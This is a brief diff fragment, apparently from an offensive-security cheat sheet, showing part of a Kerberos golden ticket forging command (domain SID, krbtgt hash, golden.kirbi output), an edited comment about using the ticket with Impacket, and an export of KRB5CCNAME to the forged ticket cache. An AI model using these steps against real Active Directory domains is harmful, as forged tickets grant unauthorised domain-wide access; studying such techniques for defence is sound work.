 /sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi

-# Impacket — use the ticket
+# Use the ticket with impacket

 export KRB5CCNAME=golden.ccache